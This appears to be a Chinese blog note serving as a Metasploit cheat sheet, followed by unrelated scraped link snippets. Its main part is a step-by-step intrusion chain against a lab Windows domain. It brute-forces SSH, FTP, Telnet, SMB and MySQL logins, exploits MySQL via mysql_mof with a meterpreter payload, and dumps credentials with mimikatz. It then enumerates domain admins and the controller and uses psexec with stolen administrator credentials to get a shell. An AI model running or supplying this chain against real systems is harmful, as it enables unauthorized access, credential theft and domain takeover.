msf mysql 弱口令爆破_msf各种弱口令爆破
Msf:
写的很乱 记录下msf各个爆破弱口令的模块
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24 使用arp_scanner模块 检测在线主机
metasploit 增加路由
route add 10.10.1.3 255.255.255.0 1
使用扫描模块
use scanner/portscan/tcp
爆破ssh
Msf>use auxiliary/scanner/ssh/ssh_login
爆破ftp
Msf>use auxiliary/scanner/ftp/ftp_login
爆破telnet
Msf>use auxiliary/scanner/telnet/telnet_login
爆破smb
auxiliary/scanner/smb/smb_login
爆破Mysql
use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
使用mof模块进行权限获取
use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit
Mimikatz导出hash
meterpreter > load mimikatz
meterpreter > kerberos
一些域内的命令
查看域
net view /domain
查看当前域中的计算机
net view
查看CORP域中的计算机
net view /domain:CORP
Ping计算机名可以得到IP
ping Wangsong-PC
获取所有域的用户列表
net user /domain
获取域用户组信息
net group /domain
获取当前域管理员信息
net group "domain admins" /domain
查看域时间及域服务器的名字
net time /domain
net time /domain 就可以知道域的计算机名
WIN-723O786H6KU.moonsec.com 10.10.1.2 这个就是域控
net group "domain admins" /domain
反弹shell
msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit
msf mysql 弱口令爆破_msf各种弱口令爆破相关推荐
- 弱类型 python_弱的解释|弱的意思|汉典“弱”字的基本解释
详细字义 ◎ 弱 ruò 〈形〉 (1) (会意.小篆字形,两把弯曲的弓,"彡"( shān)象毛羽之形,合起来表示柔弱.本义:气力小;势力差) (2) 同本义.与"强& ...
- C语言:__attribute__((weak)) 弱符号与__attribute__ ((weakref())弱引用
C语言中的__attribute__((weak)) 与 __attribute__((weakref()) 引言:最近在看 linux 中一些驱动代码.驱动代码中为了实现程序的扩展性和兼容性用了很多 ...
- 字典爆破php,【爆破大法】百站爆破经验总结(附带各种爆破字典)
原标题:[爆破大法]百站爆破经验总结(附带各种爆破字典) 近来10多天一直在学习爆破大法,下面是我为大家献上的百战爆破总结. 1.字典大法好又好 (1).明文Top1400+: 用户名 密码1000合 ...
- 数据库配置口令复杂度策略和口令有效期策略
(1)设置全局默认密码过期时间 修改配置文件my.ini,添加以下内容 [mysqld] default_password_lifetime=90 #密码90天过期 运行时临时修改: # mysql ...
- [C语言]口令比较填空:阅读程序,按要求在空白处填写适当的表达式或语句,使程序完整并符合题目要求。 下面程序比较用户键盘输入的口令userInput与内设的口令password是否相同。若相同,
阅读程序,按要求在空白处填写适当的表达式或语句,使程序完整并符合题目要求. 下面程序比较用户键盘输入的口令userInput与内设的口令password是否相同.若相同,则输出"Cor ...
- 瑜伽教学法 | <前屈-下犬式-山式串联口令>,手把手纠正口令不足,教你精准口令的秘诀!
今天分享3位老师关于瑜伽课堂上常见的 <前屈-下犬式-山式>串联口令,并且和大家一起分析一下,这三个口令的优缺点,以及改善的方法,帮助大家取长补短,获得进步. 老师A: 山式站立,双脚分开 ...
- euclidea教程_爆破泡泡历险游戏下载-爆破泡泡历险官方版v1.0.4 安卓版 - 极光下载站...
爆破泡泡历险是非常不错好玩的休闲冒险类手游,游戏有着经典的游戏玩法和各种机关陷阱等待着玩家来挑战,在游戏中玩家需要通过重重冒险,一路上过关斩将,收集关卡中的爆棚泡泡,同时玩家可以使用技能消灭面前的敌人 ...
- 带有验证码的爆破(包含Burp suite工具爆破)
带有验证码的爆破 爆破环境 登录页面具有验证码的验证,并且验证码是以图片的形式展示的. 没有次数限制和时间限制(符合爆破的要求!) 爆破原理 爆破主要是通过不断提交数据表单来试错,当然前提就是次数不限 ...
- 计算机系统用户口令必须加密,计算机系统用户口令(密码)安全管理规定
第十五条计算机用户口令基本要求由口令长度.口令字符复杂度.口令历史,口令最长有效期组成: (一)口令最小长度:6位 (二)口令字符组成复杂度:口令由数字.大小写字母及特殊字符组成,且至少包含其中两种字 ...
最新文章
- 线段树分裂与合并 ----- P2824 [HEOI2016/TJOI2016]排序 [线段树分裂合并 OR 01序列排序+二分线段树]
- 【c语言】蓝桥杯算法训练 1的个数
- jsp简单练习-简单的下拉表单
- 区县政府网站群建设新思路
- 吴恩达机器学习笔记一
- 详解华为12种数据采集技术及应用实践
- 【转】java.util.ResourceBundle使用详解
- 程序员不加班你还想干嘛?
- IPtables终于可以使用了,客户机不可以上网的问题解决了
- Flash-制作空心文字
- matlab左侧栏没了,AI软件左侧的工具栏不见了没有了怎么显示出来
- linux 如何做共享磁盘阵列,在Linux上玩转磁盘阵列分享
- Maven 项目使用开源中国镜像
- 基金定投收益计算公式和复利计算公式
- 【我的Android进阶之旅】如何在Android Studio开发NDK的时候,通过addr2line或者ndk-stack来定位出错代码的位置
- 详谈软件工程之需求工程(一)
- 转 C语言改变字体颜色,如何在c语言中改变背景和字体的颜色?
- 工控软件项目和文档整理
- vmware player无法运行及其解决方法
- UML类图关系的画法